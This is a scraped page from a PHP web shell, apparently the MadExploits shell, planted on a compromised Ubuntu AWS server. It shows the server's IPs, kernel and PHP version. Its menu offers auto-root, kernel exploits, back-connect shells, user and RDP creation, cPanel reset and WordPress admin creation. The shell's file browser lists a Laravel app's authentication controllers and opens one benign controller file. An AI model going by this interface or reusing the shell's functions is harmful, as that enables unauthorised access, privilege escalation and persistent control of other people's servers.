Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 13.58.242.216
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
app /
Http /
Controllers /
Auth /
[ HOME SHELL ]
Name
Size
Permission
Action
ApiAuthController.php
2.47
KB
-rw-rw-r--
ForgotPasswordController.php
2.4
KB
-rw-rw-r--
LoginController.php
6.23
KB
-rw-rw-r--
RegisterController.php
5.81
KB
-rw-rw-r--
RegisterTesters.php
972
B
-rw-rw-r--
ResetPasswordController.php
1.47
KB
-rw-rw-r--
VerificationController.php
1.07
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : VerificationController.php
<?php namespace App\Http\Controllers\Auth; use Illuminate\Http\Request; use Illuminate\Routing\Controller; use Illuminate\Foundation\Auth\VerifiesEmails; class VerificationController extends Controller { /* |-------------------------------------------------------------------------- | Email Verification Controller |-------------------------------------------------------------------------- | | This controller is responsible for handling email verification for any | user that recently registered with the application. Emails may also | be resent if the user did not receive the original email message. | */ use VerifiesEmails; /** * Where to redirect users after verification. * * @var string */ protected $redirectTo = '/'; /** * Create a new controller instance. * * @return void */ public function __construct() { $this->middleware('auth'); $this->middleware('signed')->only('verify'); $this->middleware('throttle:6,1')->only('verify', 'resend'); } }
Close